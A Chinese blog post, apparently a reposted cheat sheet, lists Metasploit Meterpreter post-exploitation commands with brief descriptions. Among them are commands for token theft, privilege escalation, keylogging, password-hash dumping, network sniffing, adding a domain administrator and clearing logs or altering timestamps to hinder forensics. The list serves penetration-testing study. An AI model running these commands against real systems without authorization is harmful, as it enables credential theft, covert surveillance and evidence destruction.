metasploit中meterpreter命令
2024-08-22 22:08:32
meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。
常见的meterpreter命令
- run scriptname 运行Meterpreter脚本,在scripts/meterpreter目录下可查看所有的脚本名。
- sysinfo 列出受控主机的系统信息。
- ls 列出目标主机的文件和文件夹信息。
- use priv 加载特权提升扩展模块,来扩展Meterpreter库。
- ps 显示所有运行进程以及关联的用户账号。
- migrate PID 迁移到一个指定的进程ID(PID可通过ps从目标主机上获得)。
- use incognito 加载incognito功能(用来盗窃目标主机的令牌或是假冒用户).
- list_tokens -u 列出目标主机用户的可用令牌。
- list_tokens -g 列出目标主机用户组的可用令牌。
- impersonate_token DOMAIN_NAME\\USERNAME 假冒目标主机上的可用令牌。
- steal_token PID 盗窃给定进程的可用令牌并进行令牌假冒。
- drop_token 停止假冒当前令牌。
- getsystem 通过各种攻击向量来提升系统用户权限。
- shell 以所有可用令牌来运行一个交互的shell。
- execute -f cmd.exe -i 执行cmd.exe命令并进行交互。
- execute -f cmd.exe -i -t 以所有可用的令牌来执行cmd命令。
- execute -f cmd.exe -i -H -t 以所有可用的令牌来执行cmd命令并隐藏该进程。
- rev2self 回到控制目标主机的初始化用户账号下。
- reg command 在目标主机注册表中进行交互,创建,删除,查询等操作。
- setdesktop number 切换到另一个用户界面(该功能基于哪些用户已登录)。
- screenshot 对目标主机的屏幕进行截图。
- upload file 向目标主机上传文件
- download file 从目标主机下载文件。
- keyscan_start 针对远程目标主机开启键盘记录功能。
- keyscan_dump 存储目标主机上捕获的键盘记录。
- keyscan_stop 停止针对目标主机的键盘记录功能。
- getprivs 尽可能多的获取目标主机上的特权。
- uictl enable keyboard/mouse 接管目标主机的键盘和鼠标。
- background 将你当前的Meterpreter shell转为后台执行。
- hashdump 导出目标主机中的口令哈希值。
- use sniffer 加载嗅探模块。
- sniffer_interfaces 列出目标主机所有开放的网络接口。
- sniffer_dump interfaceID pcapname 在目标主机上启动嗅探。
- sniffer_stats interfaceID 获取正在实施嗅探网络接口的统计数据。
- sniffer_start interfaceID packet-buffer 在目标主机上针对特定范围的数据包缓冲区启动嗅探。
- sniffer_stop interfaceID 停止嗅探。
- add_user username password -h ip 在远程目标主机上添加一个用户。
- add_group_user "Domain Admins" username -h ip 将用户添加到目标主机的域管理员组中。
- clearev 清除目标主机上的日志记录。
- timestomp 修改文件属性,例如修改文件的创建时间(反取证调查)。
- reboot 重启目标主机。
最新文章
- 51nod 1613翻硬币
- Cocos2dx Widget button透明区域过滤
- linux学习笔记之零散笔记。
- sql标识符和格式
- swift UILable的用法
- 跨域 Ajax 其他可选技术 异步
- 编译虚拟机jvm——openjdk的编译
- terraform基本使用
- Djagno从入门到放弃
- 为了下载和使用最新的git,只好安装了迅雷
- hibernate状态转换关系图【原】
- Swift5 语言指南(十三) 方法
- C语言常用修饰符
- Permutation Sequence leetcode java
- ASP.NET MVC 5 开发环境配置
- boost::asio::io_service类
- bag of words
- .net core 中 identity server 4 之术语
- calibre,完成对各种格式的电子书籍的管理和格式转换及同步
- C# 矩阵乘法实现
热门文章
- Django model 表与表的关系
- BZOJ1563 NOI2009诗人小G(动态规划+决策单调性)
- JavaScript无法运行问题
- python 随机数模块 -- random
- [luogu3178][bzoj4034][HAOI2015]树上操作
- 洛谷 P3313 [SDOI2014]旅行 解题报告
- Jenkins中使用Azure Powershell连接Service Fabric报错not recognized的原因与解决办法
- C# 面向对象零碎知识点
- A1084. Broken Keyboard
- 【CH1602】最大异或和 trie+贪心